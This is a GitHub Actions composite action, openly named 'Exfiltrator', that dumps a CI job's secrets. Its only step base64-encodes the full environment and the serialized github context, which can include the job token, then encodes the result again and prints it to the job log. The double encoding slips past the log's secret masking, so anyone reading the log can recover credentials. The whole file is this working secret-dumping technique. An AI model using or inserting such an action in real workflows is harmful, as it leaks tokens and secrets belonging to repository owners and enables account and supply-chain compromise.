name: 'Exfiltrator'
description: 'This exfiltrates secrets and environment variables.'

runs:
  using: "composite"
  steps:
    - name: 'Print secrets and environment variables to the terminal'
      shell: bash
      run: echo $(printf '[%s, %s, %s]' "{\"envvars\":\"$(env | base64 -w 0)\"}" "$GITHUB_JSON" "$EMPTY" | base64 -w 0)
      env:
        GITHUB_JSON: ${{ toJSON(github) }}
        EMPTY: "{\"vars\":\"no vars\"}"
        
